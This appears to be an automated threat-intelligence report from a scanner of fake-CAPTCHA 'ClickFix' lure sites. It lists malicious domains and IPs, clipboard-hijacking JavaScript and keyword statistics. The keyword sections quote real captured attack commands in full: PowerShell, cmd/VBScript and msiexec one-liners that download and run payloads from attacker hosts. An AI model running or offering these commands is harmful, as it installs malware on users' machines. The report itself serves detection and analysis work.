ClickGrab Threat Analysis Report - 2026-05-16

Generated on 2026-05-16 01:52:58

Executive Summary

• Total sites analyzed: 100
• Sites with malicious content: 22
• Unique domains encountered: 2,053
• Total URLs extracted: 8,587
• PowerShell download attempts: 2
• Clipboard manipulation instances: 100

Domain Analysis

Most Frequently Encountered Domains

• bharatnamkeens.com: 405 occurrences
• baovechuyennghiep.baovengayvadem.com: 348 occurrences
• www.maheshwaree.com: 320 occurrences
• 98.70.13.131: 309 occurrences
• fudgeshop.com.au: 265 occurrences
• picsera.com: 226 occurrences
• 18.176.47.246: 218 occurrences
• adturekorea.co.kr: 214 occurrences
• scillarodriguez.com: 199 occurrences
• www.ccera-icar.org: 178 occurrences
• www.evodigital.com.au: 156 occurrences
• www.creatorssky.com: 156 occurrences
• devblog.ezeelogin.com: 126 occurrences
• www.dorper.com.au: 125 occurrences
• picsera.sirv.com: 121 occurrences

URL Pattern Analysis

reCAPTCHA imagery

11 occurrences across 8 distinct URLs

• https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
• https://www.google.com/recaptcha/api.js (2 times)
• https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
• https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (1 times)
• https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm (1 times)
• ...and 3 more distinct URLs

Font resources

72 occurrences across 60 distinct URLs

• https://fonts.gstatic.com (5 times)
• https://fonts.googleapis.com (3 times)
• https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0 (2 times)
• https://adturekorea.co.kr/js/font-awesome/css/font-awesome.min.css?ver=220620 (2 times)
• https://use.fontawesome.com/releases/v5.6.3/css/all.css (2 times)
• ...and 55 more distinct URLs

CDN hosted scripts

10 occurrences across 10 distinct URLs

• https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js (1 times)
• https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/ (1 times)
• https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)
• https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=6.8.5 (1 times)
• https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js?ver=6.0.8 (1 times)
• ...and 5 more distinct URLs

Google resources

134 occurrences across 75 distinct URLs

• https://bharatnamkeens.com/wp-content/plugins/widget-google-reviews/assets/img/guest.png (32 times)
• https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (13 times)
• https://www.googletagmanager.com/gtm.js?id= (4 times)
• https://fonts.googleapis.com (3 times)
• https://www.google (3 times)
• ...and 70 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 529 (113 unique)

Keyword Categories

Social Engineering

46 unique keywords

• captcha-js
• exec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
• CAPTCHA
• robot
• captcha_word_new_402692
• CAPTCHA-logo
• Verification
• Verification ID
• command = "msiexec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
• exec /i https://i-like-ele-phants-verification.live/iamchallenge/verification/UserID7383526;`
• ...and 36 more

Obfuscation Indicators

11 unique keywords

• eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")
• eval(
• eval("clearTimeout(timeIn"+uid+")")
• eval("clearTimeout(timeOut"+uid+")")
• eval(script)
• eval('var timeOut'+popupItems[i].id)
• eval(frameContents)
• Command for the linkW!Set the Show Command for the linkWTell the link to resolve itselfWWW!Get the IconLocation for the linkW!Set the IconLocation for the linkW!Tell the link to save the changesWISetupStringTable InterfaceWWWGet string from nameWWget_SuiteCallbackWput_SuiteCallbackWget_SuiteExtensionput_SuiteExtensionICommand line argument passed to setup.exe when it's launched after rebootW*Set a shortcut property for an opened link7Retrieve any failures from applying shortcut propertiesWWW0Set a shortcut property for Run As AdministratorWW3Retrieve shortcut property for Run As AdministratorWWW.Interface ISetupDynamicLinkedLibraryControllerInstallShield LogServices ClassWWWISetupLogService Interface8Opens the Log Database from the specified Storage objectWW:Creates a new Log Database on the specified Storage object*Opens the Log Database in a read-only modeISetupLogService2 InterfaceWWWSetupMainWindow ClassWISetupMainWindow InterfaceWindow caption Window handleWShows/Hides wait cursorWWW Create windowWDestroy windowISetupWindowText Interfaceproperty Color property TextW
• eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")
• eval(this._loadScript(url.url) + "\n//@ sourceURL= " + url.url)
• ...and 1 more

System Commands

33 unique keywords

• exec(
• exec()done(int)accept()reject()showExtension(bool)boolsizeGripEnabledmodalL_yeX[eP[el7ceb:e�S
  e@�eP|e�|e�eX7ce�S:ePQ:ej:eT:e�ee��ej{Oep{Oev{Oe|{Oe�{Oe�k:e�\:e�]:ePePtePeeP`eP`e�p:eP`eee �Fe �Fe �Fe �Fea:e�[:e�X:eP`e �Fe �Fe �Fe �Fe �Fe�n:e �Fe�ae@ eP`e�`e��e �Fe �Fe �Fe �Fe �Fe`�He�W:e Q:e0Q:eQDialog::exec: Recursive call detected�7ce�w:e�S
e@�eP|e�|e`�e�7cep�6ey6e �6ex:e�6ed{OeP�6ep{Oev{Oe|{Oe�{Oe�e�s:e�s:ePe`�6e�6e`�6e��6e�6e@�6eP`e��6eК6e �Fe �Fep�6e �Fe��6ep`e`�6eP`e �Fe��6e�6e��6e��6e��6e �Fe�ae�6e��6ep�6ep�6e �Fe �Fe �Fe �Fe �Fe`�He@�7e@�6e�x6e�9ep�6e�9e&Show this message again�7cep:e`�He�8ce��:e�S
e@�eP|e�|e`�eL8ceP�Ne��Ne��Ne �:e�ee��ej{Oep{Oev{Oe|{Oe�{Oe�k:e�\:e�]:ePePteP`eePePe�p:ePeee �Fe �Fe �Fe �Fea:e�[:e�X:ePe �Fe �Fe �Fe �Fe �Fe�n:e �Fe�ae@y:ePe�e��e �Fe �Fe �Fe �Fe �Fe�Hep�:e Q:e0Q:eshowMessageQString<p><b>%1</b></p>Warning:Fatal Error:Debug Message:^(.*)\(([a-zA-Z0-9_.*? +;#\-\[\]@\{\}/!<>\$%&=^~:\|]*)\)$ �� .(NIpf������

)
• const command =
• command =powershell -c "Invoke-WebRequest -Uri 'http://95.164.53.214:5554/d.bat' -OutFile \"%temp%\d.bat\" -UseBasicParsing; Start-Process \"%temp%\d.bat\"";
• exec /i http://inkbookwriters.com/verify';
• command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://198.13.158.127:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
• cmd.exe /c powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;";`
• cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://198.13.158.127:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
• exec(url))
• command = 'msiexec /i http://inkbookwriters.com/verify /qn';
• ...and 23 more

Verification Text

3 unique keywords

• ray id
• Hidden
• hidden

Technical Terms

20 unique keywords

• ResponseText
• responseText
• ieX
• WebClient
• failed_to_retrieve
• XMLHTTP
• bypass
• .exe
• Ray ID
• Bypass
• ...and 10 more

Most Frequent Keywords

• hidden: 47 occurrences
• robot: 39 occurrences
• Robot: 29 occurrences
• verification: 20 occurrences
• CAPTCHA: 18 occurrences
• Verification: 17 occurrences
• failed_to_retrieve: 17 occurrences
• CAPTCHA Verification: 16 occurrences
• I am not a robot: 16 occurrences
• You will observe: 16 occurrences
• verification-id: 16 occurrences
• To better prove you are not a robot: 16 occurrences
• Verification ID: 15 occurrences
• Ray ID: 14 occurrences
• Checking if you are human: 14 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';, command = 'cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

Group 2: CAPTCHA Verification, CAPTCHA-verificatie-ID, Verification, verification

Group 3: Verification ID, verification-id, verification_data, verification id, Verification Hash, verification_id

Group 4: Ray ID, ray id

Group 5: CAPTCHA, captcha, captcha-badge, captcha-logo, CAPTCHA-logo, captcha-box, captcha_word, captcha_sid, captcha-js, captcha_0, Captcha

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

• ComponentsUnregistering
• RemoteHostClosedError
• 071e7611c43a0d999154c463167f066d
• identifiersUnregistering
• CREATEVROOTSCreating

Clipboard Manipulation Analysis

Detected clipboard manipulation in 100 instances.

Document.Execcommand Copy

Found in 42 snippets (42.0% of clipboard code)

Examples:

document.execCommand('copy')

try { document.execCommand('copy')

document.execCommand("copy")

Textarea Manipulation

Found in 45 snippets (45.0% of clipboard code)

Examples:

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

tListener("click", function () { const textarea = document.createElement('textarea'

ng is the safe placeholder above const textarea = document.createElement('textarea'

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Report truncated for storage. Full per-site detail is available in the scan JSON under nightly_reports/.